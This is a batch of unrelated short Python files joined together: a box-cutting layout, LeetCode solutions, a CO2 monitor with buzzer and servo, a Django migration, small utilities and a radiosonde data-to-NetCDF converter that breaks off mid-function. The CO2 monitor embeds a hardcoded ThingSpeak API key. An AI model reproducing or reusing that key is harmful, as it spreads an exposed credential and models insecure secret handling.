Lbottom=module.add_layer('bottom', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('top', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('back', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
Lbottom=module.add_layer('side', material='perspex', thickness=thickness, z0=0, zoffset=-thickness-box_depth)
back_border=FingerJointBoxSide(
centre,
box_width,
box_height,
'in',
corners={'left':'off',
'top':'off',
'right':'off',
'bottom':'off'},
sidemodes={},
tab_length=tab_length,
thickness=thickness,
cutterrad=0,
cutter=cutter,
centred=True,
fudge=fudge,
auto=True
)
back=module.add_path(Part(name='back', border=back_border, layer='back'))
back.number=2
bottom_border = FingerJointBoxSide( centre,
box_width,
box_depth,
'in',
corners={ 'left':'off',
'top':'on',
'right':'off',
'bottom':'on'},
sidemodes={},
tab_length=tab_length,
thickness={ 'left':thickness,
'right':thickness,
'bottom':thickness,
'top':thickness},
cutterrad=0,
cutter=cutter,
centred=True,
fudge=fudge,
auto=True
)
top=module.add_path(Part(name='top', border=bottom_border, layer='top'))
bottom=module.add_path(
Part(name='bottom',
border=bottom_border,
layer='bottom'
)
)
side = module.add_path(
Part(name='side',
border = FingerJointBoxSide(
centre,
box_depth,
box_height,
'in',
corners={'left':'on',
'top':'on',
'right':'on',
'bottom':'on'},
sidemodes={},
tab_length=tab_length,
thickness ={'left':thickness,
'right':thickness,
'bottom':thickness,
'top':thickness},
cutterrad=0,
cutter=cutter,
centred=True,
fudge=fudge,
auto=True
),
layer='side'
),
layers='side'
)
side.number=2
|
def twoSum(self, nums: List[int], target: int) -> List[int]:
"""
1. 暴力,双循环
O(n^2)
"""
"""
method 2
遍历一次存入hash,再遍历第二次查询 target-num 是否存在于hash
O(n), O(n)
"""
dic = {} # key val: num , index
for i in range(len(nums)):
dic[nums[i]] = i
for i in range(len(nums)):
if target - nums[i] in dic and dic[target - nums[i]] != i:
return [i, dic[target - nums[i]]]
return []
"""
method 3
一遍 hash,将当前值存入,往后继续遍历,并查看target-num是否存在
"""
# dic = {}
# for i in range(len(nums)):
# if (target - nums[i]) not in dic:
# dic[nums[i]] = i
# else:
# return [dic[target - nums[i]], i]
# return [] |
# -*- coding: utf-8 -*-
from time import time
import button
import thingSpeakService
import buzzer
import servo
import rotation
import led
from grove import grove_4_digit_display
THING_SPEAK_CHANNEL = 935198
THING_SPEAK_API_KEY = '81SYGRV7PHQU25C8'
class StateMachine():
def __init__(self, button, display, sensor_service, buzzer, rotation_sensor, servo, led):
self.button = button
self.display = display
self.sensor_service = sensor_service
self.buzzer = buzzer
self.rotation_sensor = rotation_sensor
self.servo = servo
self.led = led
self.state = self.co2
self.old_state = self.state
self.state_change_time = 0
self.cycle_display_delay = 5
self.co2_threshold = 2000
self.alarm_muted = False
self.i = 0
self.last_rotation = 0
self.last_rotation_time = 0
self.rotation_delay = 5
def run(self):
if self.state != self.old_state:
self.old_state = self.state
self.state_change_time = time()
# display co2 measurement with servo
co2 = self.sensor_service.get_co2()
self.servo.set_pulsewidth(co2)
# show with led if over threshold
if co2 > self.co2_threshold:
self.led.turn_on()
else:
self.led.turn_off()
# run state
self.state()
def test_for_alarm(self):
if self.sensor_service.get_co2() > self.co2_threshold:
if not self.alarm_muted:
self.alarm_muted = True
self.state = self.alarm
else:
self.alarm_muted = False
def cycle_display(self):
states = [self.temp, self.hum, self.co2]
if self.button.was_double_pressed():
self.state = self.set_co2_threshold
elif self.button.was_pressed() or time() - self.state_change_time > self.cycle_display_delay:
self.state = states[(states.index(self.state) + 1) % len(states)]
self.button.reset()
def show_text(self, text):
self.i = (self.i + 1) % (len(text) + 4)
self.display.show(f" {text} "[self.i:self.i+4])
def show_co2(self, co2=None):
if co2 is None:
co2 = self.sensor_service.get_co2()
# print(f"co2: {co2}")
co2str = f"{co2:4}"
self.display.show(co2str[-4:])
def temp(self):
t = self.sensor_service.get_temp()
# print(f"temp: {t}")
self.display.show(f"{str(round(t))[-2:]:2}*C")
# next state
self.cycle_display()
self.test_for_alarm()
def hum(self):
h = self.sensor_service.get_hum()
# print(f"hum: {h}")
self.display.show(f"h {str(round(h))[-2:]:2}")
# next state
self.cycle_display()
self.test_for_alarm()
def co2(self):
self.show_co2()
# next state
self.cycle_display()
self.test_for_alarm()
def set_co2_threshold(self):
rotation_co2 = round(self.rotation_sensor.get_translated_value() / 50) * 50
current_time = time()
if rotation_co2 != self.last_rotation:
self.last_rotation = rotation_co2
self.last_rotation_time = current_time
self.show_co2(rotation_co2)
self.co2_threshold = rotation_co2
# next state
if current_time - self.last_rotation_time > self.rotation_delay or self.button.was_pressed():
self.state = self.co2
self.last_rotation = -1
def alarm(self):
self.show_co2()
self.buzzer.turn_on()
# next state
if self.button.was_pressed():
self.state = self.co2
self.buzzer.turn_off()
if self.sensor_service.get_co2() < self.co2_threshold:
self.alarm_muted = True
self.state = self.co2
self.buzzer.turn_off()
disp = grove_4_digit_display.Grove(16, 17, brightness=grove_4_digit_display.BRIGHT_HIGHEST)
button = button.Button(pin=5, double_press_threshold=0.4)
service = thingSpeakService.ThingSpeakService(channel=THING_SPEAK_CHANNEL, api_key=THING_SPEAK_API_KEY)
buzzer = buzzer.Buzzer(12)
servo = servo.Servo(pin=18, min=0, max=5000)
rot_sensor = rotation.RotationSensor(pin=4, min=0, max=5000)
led_actuator = led.Led(6)
SM = StateMachine(button=button, display=disp, sensor_service=service, buzzer=buzzer, rotation_sensor=rot_sensor, servo=servo, led=led_actuator)
try:
while True:
SM.run()
except KeyboardInterrupt:
disp.show(" ")
|
class Solution(object):
"""
# This solution times out on long sets. Passed 1607/1808 test cases
def isMatch(self, s, p):
if len(s) == 0:
if len(p) == 0:
return True
return p == "*"*len(p)
if len(p) == 0:
return False
if s[0] == p[0] or p[0] == "?":
return self.isMatch(s[1:], p[1:])
if p[0] == "*":
for i in range(0, len(s)+1):
if self.isMatch(s[i:], p[1:]):
return True
return False
return False
"""
def isMatch(self, s,p):
i,j,s_star,p_star = 0,0,0,-1
while i<len(s):
if j<len(p) and (s[i]==p[j] or p[j]=='?'):
i,j = i+1,j+1
elif j<len(p) and p[j]=='*':
s_star,p_star = i,j # Provides an anchor to back track
j+=1
# Goes back to saved state (if there is one)
elif p_star!=-1:
s_star +=1
i,j = s_star,p_star+1
else: # No saved state. Already at the end of stack.
return False
# Why can you discard the previous saved states?
# Because when the second "*" is encountered, if there is a mismatch in all possibilities of left tree,
# there is no possibility of success in the right trees.
# Example: p = "*abc*". Since "abc" does not find a match, all states should be pruned.
while j<len(p) and p[j]=='*':
j+=1
return j==len(p)
|
# Generated by Django 2.2.13 on 2020-12-16 19:33
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carts_api', '0018_auto_20201123_1702'),
]
operations = [
migrations.CreateModel(
name='UploadedFiles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('filename', models.CharField(default='', max_length=256)),
('aws_filename', models.CharField(default='', max_length=256)),
('question_id', models.CharField(max_length=16)),
('uploaded_date', models.DateTimeField(auto_now_add=True)),
('uploaded_username', models.CharField(default='', max_length=16)),
('uploaded_state', models.CharField(default='', max_length=16)),
],
),
]
|
import base64
import os
def generate_token() -> str:
return base64.b64encode(os.urandom(32)).decode()
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, unicode_literals
from ava.task import action
from bs4 import BeautifulSoup
@action
def parse(html_text, parser='html.parser'):
""" Use BeautifulSoup4 to parse HTML document.
:param html_text: the HTML data
:param parser: the type of parser to use
:return: a BS4 parser
"""
return BeautifulSoup(html_text, parser)
|
setnumber = {10, 5, 65, 'saquib', 'python', 'flask', 10, 'value'}
set2 = {'python', 'flask', 10}
print(set2)
print(setnumber)
# denoted by {} does not show the duplicate value
# can store string and integer values
setnumber.add(2.6)
print(setnumber)
setnumber.copy()
print(setnumber)
set2 = setnumber.copy()
print(set2)
# copy makes the shallow copy of setnumber to set2
set2.difference()
print(setnumber.difference(set2))
A = {10, 20, 30, 40, 80}
B = {100, 30, 80, 40, 60, 80}
print (A.difference(B))
print (B.difference(A))
setnumber.difference_update()
|
#scattegories ?
#provides basic framework for playing
#still need pencils and other players
#TODO: fully automate + AI ?
import random, time
numPlayers = 0
timer = 180 #seconds
numCategories = 12
categoryList = []
letter = ""
def getNum():
num = 0
loop = True
while loop:
try:
num = input('')
num = int(num)
loop = False
except:
print("Sorry, that's not a number. Please enter the numerical digit.")
return num
def getCategories(num):
allCats = []
chosenCats = []
f = open("categories.txt", "r")
rawData = f.read()
f.close()
allCats = rawData.split("\n")
for i in range(num):
chosenCats += [ allCats[random.randrange(len(allCats))] ]
return chosenCats
def getLetter():
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
return alphabet[random.randrange(26)]
#game starts here
print("Welcome to Scattegories!")
print("Please enter the number of players")
numPlayers = getNum()
print("Please enter the number of categories to play. The default is 12.")
numCategories = getNum()
print("Please enter the number of seconds for the timer. The default is 180")
timer = getNum()
print("Generating " + str(numCategories) + "random categories and a random letter.")
categoryList = getCategories(numCategories)
letter = getLetter()
answers = []
print("All players ready their pencils and paper.")
print("The categories will be displayed, and you will each have " + str(timer) + "seconds to write a word beginning with the letter and matching the category.")
print("Are you ready?")
time.sleep(5)
print("Begin!")
print("The letter is " + letter)
print("And the categories are : ")
for i in range(len(categoryList)):
print (str(i + 1) + ". " + categoryList[i] )
time.sleep(timer)
print ("\n" * 100) #clear the screen effectively
print("Times up! Now discuss your answers and award points.")
|
#!/usr/bin/python
#\file simple_read.py
#\brief Simply read from serial port.
#\author Akihiko Yamaguchi, info@akihikoy.net
#\version 0.1
#\date Jul.01, 2021
import sys
import serial
if __name__=='__main__':
dev= sys.argv[1] if len(sys.argv)>1 else '/dev/ttyACM0'
baudrate= int(sys.argv[2]) if len(sys.argv)>2 else 19200
#serial.SEVENBITS
ser= serial.Serial(dev,baudrate,serial.EIGHTBITS,serial.PARITY_NONE)
try:
while True:
raw= ser.readline()
print 'Received: {raw} ({l})'.format(raw=repr(raw), l=len(raw))
finally:
ser.close()
|
# python 2.7.3
import sys
import math
n = input()
words = [None for i in range(n)]
for i in range(n):
words[i] = raw_input()
ans = []
for i in range(1, n + 1):
if n % i != 0:
continue
q = n / i
lan = set()
valid = True
for j in range(q):
temp = set(words[j * i:(j + 1) * i])
if 'unknown' in temp:
temp.remove('unknown')
if len(temp) > 1:
valid = False
break
if len(temp) == 1:
if list(temp)[0] in lan:
valid = False
break
else:
lan.add(list(temp)[0])
else:
continue
if valid:
ans.append(q)
if not ans:
print 'Igor is wrong.'
else:
print ' '.join(map(str, ans[::-1]))
|
from .base import BaseModel
class FooterModel(BaseModel):
def init(self):
self.add_property('copyright')
|
from fractions import gcd
def simplify_fraction(fraction):
return (fraction[0] // gcd(fraction[0], fraction[1]), fraction[1] // gcd(fraction[0], fraction[1]))
|
import sys
import re
from pprint import pprint, pformat
from datetime import datetime, timedelta
import pytz
import logging
from collections import namedtuple
from netCDF4 import Dataset
import numpy as np
FORMAT = '%(asctime)s %(message)s'
logger = logging.getLogger()
handler = logging.StreamHandler()
formatter = logging.Formatter(FORMAT)
handler.setFormatter(formatter)
logger.addHandler(handler)
logger.setLevel(logging.INFO)
UTC = pytz.timezone('UTC')
# Regular expressions for the parser
PILOT_REGEX = '^([0-9]+)\s*([a-z0-9\s]+)\s+pilot\s+for\s+(.*)$'
PILOT_PATTERN = re.compile(PILOT_REGEX, flags=re.IGNORECASE)
STARTED_AT_REGEX = '^started\s*at\s*(.*)$'
# Settings for the parsers
DEFAULT_INTERVAL_THRESHOLD_HOURS = 4 # hours threshold to match a given time with a time in the day (0 or 12)
DEFAULT_INTERVAL = timedelta(hours=DEFAULT_INTERVAL_THRESHOLD_HOURS)
# http://stackoverflow.com/questions/1265665/python-check-if-a-string-represents-an-int-without-using-try-except
def is_int(s):
"""Check if a given value can be parsed as Int"""
try:
int(s)
return True
except ValueError:
return False
def parse_wind_file(wind_file):
"""
Parse a file containing readings with historical wind speed and wind direction. A poor
man's simple state machine, with just two states.
"""
dates = dict()
with open(wind_file, 'r') as wf:
in_pilot = False
d = None
for line in wf:
m = PILOT_PATTERN.match(line)
if m:
if in_pilot:
logging.error("Ops. Found a PILOT message before finding the values")
raise Exception("Ops. Found a PILOT message before finding the values" )
station_id = m.group(1)
site_name = m.group(2).strip()
date = m.group(3) # 27-Mar-1995 00:00Z
d = datetime.strptime(date[:-1], '%d-%b-%Y %H:%M')
#d = d.replace(tzinfo=UTC)
dates[d] = {
'station_id': station_id,
'site_name': site_name,
'date': date,
'press_readings': dict(),
'height_readings': dict()
}
in_pilot = True
elif in_pilot:
if line.count('|') == 4 and line.count('hPa') == 0:
columns = line.split('|')
std_levels_col = columns[0].replace('/', ' ').split()
if len(std_levels_col) > 0:
hpa = std_levels_col[0]
if is_int(hpa):
hpa = str(float(hpa)) # to match the key in the dict... due to different units in the two files
if not hpa in dates[d]['press_readings']:
dates[d]['press_readings'][hpa] = dict()
if len(std_levels_col) == 3:
dates[d]['press_readings'][hpa]['std_wdir'] = std_levels_col[1]
dates[d]['press_readings'][hpa]['std_wspeed'] = std_levels_col[2]
else:
dates[d]['press_readings'][hpa]['std_wdir'] = -32768
dates[d]['press_readings'][hpa]['std_wspeed'] = -32768
for x in range(1, 4):
sig_levels_col = columns[x].replace('/', ' ').split()
if len(sig_levels_col) > 0:
height = sig_levels_col[0]
if is_int(height):
if not height in dates[d]['height_readings']:
dates[d]['height_readings'][height] = dict()
if len(sig_levels_col) == 3:
dates[d]['height_readings'][height]['sig_wdir'] = sig_levels_col[1]
dates[d]['height_readings'][height]['sig_wspeed'] = sig_levels_col[2]
else:
dates[d]['height_readings'][height]['sig_wdir'] = -32768
dates[d]['height_readings'][height]['sig_wspeed'] = -32768
elif line.strip().startswith('Message Numbers'):
in_pilot = False
return dates
# Had to implement a bit-more-complex state machine or multiple regex'es would be just too slow
class TxtFile(object):
def __init__(self):
self.started_at = ''
self.station = 0
self.longitude = 0.0
self.latitude = 0.0
self.altitude = 0
self.sounding_type = ''
self.rs_number = ''
self.serial_number = ''
self.clouds = ''
self.burst_height = 0
self.significant_levels = dict()
self.standard_pressure_levels = dict()
def __repr__(self):
return """Vaisala Text Data:
StartedAt [""" + self.started_at.strftime("%Y-%m-%d %H:%M") + """]
Station [""" + str(self.station) + """]
Latitude [""" + str(self.latitude) + """]
Longitude [""" + str(self.longitude) + """]
Altitude [""" + str(self.altitude) + """]
Sig Levels [""" + pformat(self.significant_levels, indent=4) + """]
S P Levels [""" + pformat(self.standard_pressure_levels, indent=4) + """]"""
class SimpleParser(object):
def __init__(self, wind_data):
self.data = None
self.current_state = None
self.wind_data = wind_data
def get_data(self):
return self.data
def parse(self, txt_file):
self.data = TxtFile()
self.current_state = StartedAtState(self.data)
with open(txt_file, 'r') as wf:
for line in wf:
self.parse_line(line)
if len(self.data.standard_pressure_levels) > 0:
self._tally()
def parse_line(self, line):
if self.current_state != None and self.current_state.value(line) != None:
self.current_state = self.current_state.next()
def _tally(self):
"""Tally results, by matching an entry in the wind data and getting wspeed and wdir"""
needle = self.data.started_at
haystack = self.wind_data
for date in haystack:
if abs(date - needle) <= DEFAULT_INTERVAL:
wind_data = self.wind_data[date]
# Match standard pressure readings
for press, dic in wind_data['press_readings'].items():
if press in self._get_standard_pressure_levels2():
standard_pressure_level = self._get_standard_pressure_levels2()[press]
standard_pressure_level.speed = int(dic['std_wspeed'])
standard_pressure_level.direction = int(dic['std_wdir'])
# FIXME: Match significant level readings
# for height, dic in wind_data['height_readings'].items():
# if height in self._get_significant_levels2():
# standard_pressure_level = self._get_significant_levels2()[press]
# standard_pressure_level.speed = int(dic['std_wspeed'])
# standard_pressure_level.direction = int(dic['std_wdir'])
# pprint(wind_data)
# pprint(self._get_significant_levels2())
# sys.exit(1)
def _get_standard_pressure_levels2(self):
"""Return the same dict, but where keys are pressure levels instead of secs. This way we reduce
the number of loops per pressure reading in the wind_data"""
d = dict()
for sec, standard_pressure_level in self.data.standard_pressure_levels.items():
d[standard_pressure_level.press] = standard_pressure_level
return d
def _get_significant_levels2(self):
"""Return the same dict, but where keys are heights levels instead of secs. This way we reduce
the number of loops per pressure reading in the wind_data"""
d = dict()
for sec, significant_level in self.data.significant_levels.items():
pass
#d[standard_pressure_level.press] = standard_pressure_level
return self.data.significant_levels
class State(object):
def __init__(self, txt_file):
self.next_state = None
self.txt_file = txt_file
def calc_secs(self, mins, secs):
return secs + (mins * 60)
def next(self):
return self.next_state
def value(self, line):
return None
class StartedAtState(State):
def __init__(self, txt_file):
super().__init__(txt_file)
self.next_state = StationState(txt_file)
def value(self, line):
s = None
try:
idx = line.index('Started at') + len('Started at')
if idx >= 0:
length = len(line)
s = line[idx:length]
s = s.strip()
# dates will be like: 25 March 94 10:51 GMT
idx2 = s.index(':')
if idx2 > 0:
s = s[0:idx2+3]
try:
self.txt_file.started_at = datetime.strptime(s, "%d %B %y %H:%M")
except ValueError:
self.txt_file.started_at = datetime.strptime(s, "%d %B %Y %H:%M")
except ValueError:
pass
return s
class StationState(State):
def __init__(self, txt_file):
super().__init__(txt_file)
self.next_state = LocationState(txt_file)
def value(self, line):
s = None
try:
idx = line.index('Station') + len('Station')
if idx >= 0:
length = len(line)
s = line[idx:length]
s = s.replace(':', '')
s = s.strip()
self.txt_file.station = int(s)
except ValueError:
pass
return s
class LocationState(State):
def __init__(self, txt_file):
super().__init__(txt_file)
self.next_state = SignificantLevelsState1(txt_file)
def value(self, line):
s = None
try:
idx = line.index('Location') + len('Location')
if idx >= 0:
length = len(line)
s = line[idx:length]
s = s.replace(':', '')
s = s.strip()
latitude = ''
idx2 = 1
for c in s:
if c == ' ':
break
latitude += c
idx2 += 1
self.txt_file.latitude = float(latitude)
s = s[idx2:]
s = s.strip()
direction = ''
idx2 = 1
for c in s:
if c == ' ':
break
direction += c
idx2 += 1
if direction.lower() == 's':
self.txt_file.latitude = float(self.txt_file.latitude * -1)
# ignore other possible values
s = s[idx2:]
s = s.strip()
longitude = ''
idx2 = 1
for c in s:
if c == ' ':
break
longitude += c
idx2 += 1
self.txt_file.longitude = float(longitude)
s = s[idx2:]
s = s.strip()
direction = ''
idx2 = 1
for c in s:
if c == ' ':
break
direction += c
idx2 += 1
if direction.lower() != 'e':
self.txt_file.longitude = float(self.txt_file.longitude * -1)
# ignore other possible values
s = s[idx2:]
s = s.strip()
altitude = ''
idx2 = 1
for c in s:
if c == ' ':
break
altitude += c
idx2 += 1
self.txt_file.altitude = float(altitude)
except ValueError:
pass
return s
class SignificantLevel(object):
def __init__(self, press, altitude, temp, rh, fp, speed, direction):
self.press = press
self.altitude = altitude
self.temp = temp
self.rh = rh
self.fp = fp
self.speed = speed
self.direction = direction
def __repr__(self):
return "SignificantLevel(press=%s, altitude=%s, temp=%s, rh=%s, fp=%s, speed=%s, direction=%s)" % (self.press, self.altitude, self.temp, self.rh, self.fp, self.speed, self.direction)
class SignificantLevelsState1(State):
def __init__(self, txt_file):
super().__init__(txt_file)
self.next_state = None
self.title_found = False
self.headers1_found = False
self.headers2_found = False
self.white_lines = 0
def reset_states(self):
self.headers1_found = False
self.headers2_found = False
def value(self, line):
s = None
self.next_state = None
if line.strip() == '' and self.title_found == True:
self.white_lines += 1
if self.white_lines == 4:
self.next_state = StandardPressureLevelsState1(self.txt_file)
return True
elif line.strip() == '':
return
if self.headers2_found:
if line.strip()[0].lower() != 's':
values = line.split()
if len(values) >= 7:
minutes = int(values[0])
seconds = int(values[1])
press = values[2]
height = values[3]
temp = values[4]
rh = values[5]
fp = values[6]
secs = self.calc_secs(minutes, seconds)
if secs not in self.txt_file.significant_levels:
self.txt_file.significant_levels[secs] = SignificantLevel(press=press, altitude=height, temp=temp, rh=rh, fp=fp, speed='', direction='')
# FIXME: add to element
#pprint(minutes)
self.next_state = self
else:
self.reset_states()
elif self.headers1_found:
s = line.strip()
if len(s) > 3 and s[0:3].lower() == 'min':
self.reset_states()
self.headers2_found = True
self.next_state = self
else:
s = None
elif self.title_found:
s = line.strip()
if len(s) > 3 and s[0:4].lower() == 'time':
self.reset_states()
self.headers1_found = True
self.next_state = self
else:
s = None
else:
try:
idx = line.index('Significant levels: Temperature/Humidity') + len('Significant levels: Temperature/Humidity')
if idx >= 0:
self.reset_states()
self.title_found = True
self.white_lines = 0
self.next_state = self
except ValueError:
s = None
return s
class StandardPressureLevel(object):
def __init__(self, press, altitude, temp, rh, fp, ascrate, speed, direction):
self.press = press
self.altitude = altitude
self.temp = temp
self.rh = rh
self.fp = fp
self.ascrate = ascrate
self.speed = speed
self.direction = direction
def __repr__(self):
return "StandardPressureLevel(press=%s, altitude=%s, temp=%s, rh=%s, fp=%s, ascrate=%s, speed=%s, direction=%s)" % (self.press, self.altitude, self.temp, self.rh, self.fp, self.ascrate, self.speed, self.direction)
class StandardPressureLevelsState1(State):
def __init__(self, txt_file):
super().__init__(txt_file)
self.next_state = None
self.title_found = False
self.headers1_found = False
self.headers2_found = False
self.white_lines = 0
def reset_states(self):
self.headers1_found = False
self.headers2_found = False
def value(self, line):
s = None
self.next_state = None
if line.strip() == '' and self.title_found == True:
self.white_lines += 1
if self.white_lines == 4:
#self.next_state = StandardPressureLevelsState2()
self.next_state = None
return s
elif line.strip() == '':
return
if self.headers2_found:
if line.strip()[0].lower() != 's':
values = line.split()
if len(values) >= 8:
try:
minutes = int(values[0])
seconds = int(values[1])
except ValueError:
return
press = values[2]
height = values[3]
temp = values[4]
rh = values[5]
fp = values[6]
ascrate = values[7]
secs = self.calc_secs(minutes, seconds)
if secs not in self.txt_file.standard_pressure_levels:
self.txt_file.standard_pressure_levels[secs] = StandardPressureLevel(press=press, altitude=height, temp=temp, rh=rh, fp=fp, ascrate=ascrate, speed='', direction='')
# FIXME: add to element
#pprint(minutes)
self.next_state = self
else:
self.reset_states()
elif self.headers1_found:
s = line.strip()
if len(s) > 3 and s[0:3].lower() == 'min':
self.reset_states()
self.headers2_found = True
self.next_state = self
else:
s = None
elif self.title_found:
s = line.strip()
if len(s) > 3 and s[0:4].lower() == 'time':
self.reset_states()
self.headers1_found = True
self.next_state = self
else:
s = None
else:
try:
idx = line.index('Standard pressure levels (PTU)') + len('Standard pressure levels (PTU)')
if idx >= 0:
self.reset_states()
self.title_found = True
self.white_lines = 0
self.next_state = self
except ValueError:
s = None
return s
def parse_txt_file(txt_file, wind_data):
"""
Parse the Vaisala txt file, returning a mixed dict.
"""
parser = SimpleParser(wind_data)
parser.parse(txt_file)
return parser.get_data()
def write_netcdf_file(data, output_file):
"""Writes the resulting data to a NetCDF file"""
dataset = Dataset(output_file, "w", format="NETCDF4_CLASSIC")
# Dimensions
dataset.createDimension("time")
dataset.setncattr('g.General.SiteWmoId', '93' + str(data.station))
dataset.setncattr('g.MeasuringSystem.Longitude', str(data.longitude) + ' degree east')
dataset.setncattr('g.MeasuringSystem.Latitude', str(data.latitude) + ' degree north')
dataset.setncattr('g.MeasuringSystem.Altitude', str(data.altitude) + ' m')
#dataset.setncattr('g.SurfaceObs.Pressure', str(ident['surface_pressure']) + ' hPa')
#dataset.setncattr('g.SurfaceObs.Temperature', str(ident['surface_temperature']) + ' °C')
#dataset.setncattr('g.SurfaceObs.RelativeHumidity', str(ident['surface_humidity']) + ' %')
dataset.setncattr('g.General.SiteCode', "INVRCRGL")
dataset.setncattr('g.General.SiteName', "Invercargill")
dataset.setncattr('g.General.SiteInstitution', "MetService New Zealand")
dataset.setncattr('g.Product.Producer', "National Institute of Water and Atmospheric Research (New Zealand)")
dataset.setncattr('g.Product.References', "https://github.com/kinow/pccora")
#dataset.station_type = ident['station_type']
#dataset.region_number = ident['region_number']
#dataset.wmo_block_number = ident['wmo_block_number']
dataset.wmo_block_number = 93
dataset.wmo_station_number = data.station
#dataset.wind_speed_unit = str(ident['wind_speed_unit']) + ', comment: 0 = m/s 1 = knots'
#dataset.telecommunications_headings = str(ident['telecommunications_headings']) + ', comment: 0 = No 1 = Yes'
#dataset.res = ident['reserved']
#dataset.sounding_type = str(ident['sounding_type']) + ', comment: 0 = PTU 1 = Only pressure 2 = No PTU (Radar'
#dataset.start_mode = str(ident['start_mode']) + ', comment: 0 = Auto 1 = Manual'
#dataset.time_elapsed = ident['time_elapsed']
#dataset.ptu_rate = ident['ptu_rate']
#dataset.spu_serial_number = ident['spu_serial_number']
#dataset.year = ident['year']
#dataset.month = ident['month']
#dataset.day = ident['day']
#dataset.julian_date = ident['julian_date']
#dataset.hour = ident['hour']
#dataset.minute = ident['minute']
#dataset.message_year = ident['message_year']
#dataset.message_month = ident['message_month']
#dataset.message_day = ident['message_day']
#dataset.message_hour = ident['message_hour']
#dataset.cloud_group = ident['cloud_group']
#dataset.weather_group = ident['weather_group']
#dataset.napp = ident['napp']
#dataset.humidity_correction = ident['humidity_correction']
#dataset.success_of_signal = ident['success_of_signal']
#dataset.pressure_accept_level = ident['pressure_accept_level']
#dataset.pressure_replace_level = ident['pressure_replace_level']
#dataset.pressure_reject_level = ident['pressure_reject_level']
#dataset.temperature_accept_level = ident['temperature_accept_level']
#dataset.temperature_replace_level = ident['temperature_replace_level']
#dataset.temperature_reject_level = ident['temperature_reject_level']
#dataset.humidity_accept_level = ident['humidity_accept_level']
#dataset.humidity_replace_level = ident['humidity_replace_level']
#dataset.humidity_reject_level = ident['humidity_reject_level']
#dataset.total_omega_count = ident['total_omega_count']
#dataset.reason_temination = ident['reason_temination']
#dataset.omega_count = ident['omega_count']
#dataset.wind_computing_mode = str(ident['wind_computing_mode']) + ', comment: 0 = Remote 1 = Local 2 = Differential'
#dataset.wind_mode = str(ident['wind_mode']) + ', comment: 0 = Omega 1 = Loran-C 2 = Radar 255 = Only PTU'
#dataset.stations_used = str(ident['stations_used']) + ', comment: One bit for each station 1 = Used 0 = Not used'
#dataset.loranc_chains_used = ident['loranc_chains_used']
#dataset.gri_chain_1 = ident['gri_chain_1']
#dataset.gri_chain_2 = ident['gri_chain_2']
#dataset.exclude_loran_transmitters = str(ident['exclude_loran_transmitters']) + ', comment: One bit for each in the chain; and chain 2 transmitted'
#dataset.phase_integration_time = str(ident['phase_integration_time']) + ', comment: 0 = time (s) 1 = Altitude (m/MSI'
#dataset.phase_integration_time_1 = ident['phase_integration_time_1']
#dataset.phase_integration_time_2 = ident['phase_integration_time_2']
#dataset.phase_integration_time_3 = ident['phase_integration_time_3']
#dataset.phase_integration_time_4 = ident['phase_integration_time_4']
#dataset.phase_integration_time_5 = ident['phase_integration_time_5']
#dataset.phase_integration_time_6 = ident['phase_integration_time_6']
#dataset.phase_integration_change_level_1 = ident['phase_integration_change_level_1']
#dataset.phase_integration_change_level_2 = ident['phase_integration_change_level_2']
#dataset.phase_integration_change_level_3 = ident['phase_integration_change_level_3']
#dataset.phase_integration_change_level_4 = ident['phase_integration_change_level_4']
#dataset.phase_integration_change_level_5 = ident['phase_integration_change_level_5']
#dataset.phase_integration_change_level_6 = ident['phase_integration_change_level_6']
#dataset.reference_pressure = str(ident['reference_pressure']) + ' hPa'
#dataset.reference_temperature = str(ident['reference_temperature']) + ' °C'
#dataset.reference_humidity = str(ident['reference_humidity']) + ' %'
dataset.institution = "MetService New Zealand"
dataset.datetime = str(data.started_at)
dataset.comment = 'For more information about the variables see: https://badc.nerc.ac.uk/data/ukmo-rad-hires/pc-coradata.html'
elapsed_time = []
#logarithmic_pressure = []
temperature = []
relative_humidity = []
#north_wind = []
#east_wind = []
altitude = []
pressure = []
dew_point = []
#mixing_ratio = []
wind_direction = []
wind_speed = []
#azimuth_angle = []
#horizontal_distance = []
#longitude = []
#latitude = []
#significance_key = []
#recalculated_significance_key = []
#radar_height = []
ascrate = []
for secs, standard_pressure_level in data.standard_pressure_levels.items():
elapsed_time.append(secs)
temperature.append(standard_pressure_level.temp)
relative_humidity.append(standard_pressure_level.rh)
altitude.append(standard_pressure_level.altitude)
pressure.append(standard_pressure_level.press)
dew_point.append(standard_pressure_level.fp)
wind_direction.append(standard_pressure_level.direction)
wind_speed.append(standard_pressure_level.speed)
ascrate.append(standard_pressure_level.ascrate)
# elapsed_time
elapsed_time_variable = dataset.createVariable('elapsed_time', 'f4', ("time", ), zlib=True, fill_value=-32768)
elapsed_time_variable.standard_name = 'elapsed_time'
elapsed_time_variable.units = 's'
elapsed_time_variable.long_name = 'Elapsed time since sonde release'
elapsed_time_variable.g_format_type = 'FLT'
elapsed_time_variable[:] = elapsed_time
# temperature
temperature_variable = dataset.createVariable('temp', 'f4', ("time", ), zlib=True, fill_value=-32768)
temperature_variable.standard_name = 'air_temperature'
temperature_variable.units = 'C'
temperature_variable.long_name = 'Temperature'
temperature_variable.g_format_type = 'FLT'
temperature_variable.coordinates = "lon lat alt"
temperature_variable[:] = temperature
# relative_humidity
relative_humidity_variable = dataset.createVariable('rh', 'f4', ("time", ), zlib=True, fill_value=-32768)
relative_humidity_variable.standard_name = 'relative_humidity'
relative_humidity_variable.units = '%'
relative_humidity_variable.long_name = 'Relative Humidity'
relative_humidity_variable.g_format_type = 'FLT'
relative_humidity_variable.coordinates = "lon lat alt"
relative_humidity_variable[:] = relative_humidity
# altitude
altitude_variable = dataset.createVariable('alt', 'f4', ("time", ), zlib=True, fill_value=-32768)
altitude_variable.standard_name = 'altitude'
altitude_variable.units = 'gpm'
altitude_variable.long_name = 'Altitude'
altitude_variable.g_format_type = 'FLT'
altitude_variable.positive = "up"
altitude_variable[:] = altitude
# pressure
pressure_variable = dataset.createVariable('press', 'f4', ("time", ), zlib=True, fill_value=-32768)
pressure_variable.standard_name = 'air_pressure'
pressure_variable.units = 'hPa'
pressure_variable.long_name = 'Pressure'
